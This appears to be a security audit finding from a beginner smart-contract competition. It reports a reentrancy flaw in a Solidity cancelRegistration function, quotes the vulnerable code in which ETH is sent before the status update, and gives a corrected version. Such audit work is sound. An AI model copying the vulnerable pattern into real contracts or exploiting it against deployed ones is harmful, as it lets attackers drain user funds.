First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy vulnerability in `cancelRegistration`

mikb

Summary

The cancelRegistration function in ThePredicter contract is vulnerable to reentrancy attacks due to state changes occurring after an external call.

Vulnerability Details

In the cancelRegistration function:

function cancelRegistration() public {
if (playersStatus[msg.sender] == Status.Pending) {
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
playersStatus[msg.sender] = Status.Canceled;
return;
}
revert ThePredicter__NotEligibleForWithdraw();
}

The function makes an external call to send ETH before updating the player's status, violating the checks-effects-interactions pattern.

Impact

An attacker could call this function repeatedly before their status is updated, withdrawing more entrance fees than they initially deposited.

Tools Used

Manual code review

Recommendations

Implement the checks-effects-interactions pattern:

function cancelRegistration() public {
require(playersStatus[msg.sender] == Status.Pending, "Not eligible");
playersStatus[msg.sender] = Status.Canceled;
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
}
Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Reentrancy in cancelRegistration

Reentrancy of ThePredicter::cancelRegistration allows a maliciour user to drain all funds.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.